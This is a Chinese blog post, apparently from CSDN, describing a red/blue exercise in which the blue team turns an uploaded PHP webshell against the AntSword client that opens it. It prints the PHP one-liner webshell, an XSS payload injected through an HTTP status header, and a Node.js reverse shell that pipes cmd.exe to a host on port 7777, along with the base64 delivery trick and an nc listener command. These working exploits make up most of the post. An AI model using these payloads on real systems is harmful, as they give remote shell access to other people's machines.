溯源反制-工具反制-蚁剑反制篇

文章描述了一场网络安全的模拟对抗,红队上传了一句话PHP木马,而蓝队通过修改webshell内容并使用Nodejs建立socket连接来反制,实现了对红队权限的获取,即使红队退出,蓝队的连接也不会断开,从而控制了主机权限。
摘要由CSDN通过智能技术生成

红队:
上传一句话木马<?php eval($_POST['cmd']);?>
蓝队:
修改红队上传的webshell内容,改为:
<?php
header('HTTP/1.1 500 <img src=# οnerrοr=alert(1)>');
红队点击添加的URL,就会出现弹窗


以下为蓝队操作:
上线:
Nodejs代码:
var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(7777, "ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
编码组合后:


header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`dm......==`,`base64`).toString())'>");

 

保存

测试

nc监听 nc -lvvp 7777
注意:监听端口也得添加在安全组,否则像我一样跟无头苍蝇似的到处问为什么我的蚁剑和阿里服务器建立不了socket连接/(ㄒoㄒ)/~~
红队:蚁剑点击,但是报错
蓝队:同时nc回连,并且拿到的权限是主机权限,因为是建立的socket连接,所以即便红队退出蚁剑,蓝队也不会断开 
最终 蓝队通过修改后门的代码实现获得蚁剑使用者的权限(主机权限)
参考链接:
朔源反制-170-对抗上线CS,Goby,蚁剑,Sqlmap等安全工具_sqlmap反制_My Year 2019的博客-CSDN博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值